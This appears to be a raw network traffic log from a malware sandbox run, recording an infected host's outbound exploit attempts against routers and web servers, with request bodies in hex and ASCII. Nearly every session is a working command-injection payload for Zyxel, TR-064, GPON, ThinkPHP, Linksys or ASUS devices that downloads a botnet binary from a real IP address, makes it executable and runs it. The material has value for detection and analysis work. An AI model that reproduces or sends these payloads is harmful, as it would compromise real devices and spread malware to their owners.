                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        505192.168.2.134188847.199.183.657547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:31.280510902 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        506192.168.2.135211664.246.156.19380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.194274902 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:32.318049908 CET174INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Date: Thu, 21 Mar 2024 04:22:33 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        507192.168.2.13426585.21.115.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549175978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        508192.168.2.1353060118.46.207.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549205065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        509192.168.2.1340094118.242.74.128443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549206018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        510192.168.2.1360082109.167.139.179443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549227953 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        511192.168.2.13483145.224.244.58443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549245119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        512192.168.2.134455842.216.184.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549273014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        513192.168.2.135804842.35.117.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549274921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        514192.168.2.1340548109.132.104.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549331903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        515192.168.2.1342634109.142.143.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549334049 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        516192.168.2.1345882212.66.85.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.549354076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        517192.168.2.135266488.198.28.13480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:32.667180061 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:33.648264885 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:33.820838928 CET509INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:33 GMT
                                                        Server: Apache
                                                        X-Robots-Tag: noindex, nofollow, noarchive
                                                        Content-Length: 299
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 64 65 64 69 35 39 35 36 2e 79 6f 75 72 2d 73 65 72 76 65 72 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at dedi5956.your-server.de Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        518192.168.2.1359730172.65.54.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.132086992 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        519192.168.2.1351378172.65.236.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.132143021 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        520192.168.2.1354612172.87.206.24055555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.219926119 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        521192.168.2.1340780172.65.112.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.221422911 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        522192.168.2.1341432212.191.192.7980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.287249088 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:34.416538000 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:34.633476019 CET121INHTTP/1.0 301 Moved Permanently
                                                        Location: https://uml.lodz.pl/
                                                        Connection: Keep-Alive
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        523192.168.2.133390280.211.188.14480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.319690943 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        524192.168.2.1352032212.120.205.15980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.386980057 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:33.707220078 CET85INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Server: RomPager/4.07 UPnP/1.0
                                                        EXT:
                                                        Mar 21, 2024 05:22:39.664900064 CET85INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Server: RomPager/4.07 UPnP/1.0
                                                        EXT:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        525192.168.2.1354746206.238.152.14980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.676436901 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:34.515294075 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:34.669769049 CET306INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 146
                                                        Connection: keep-alive
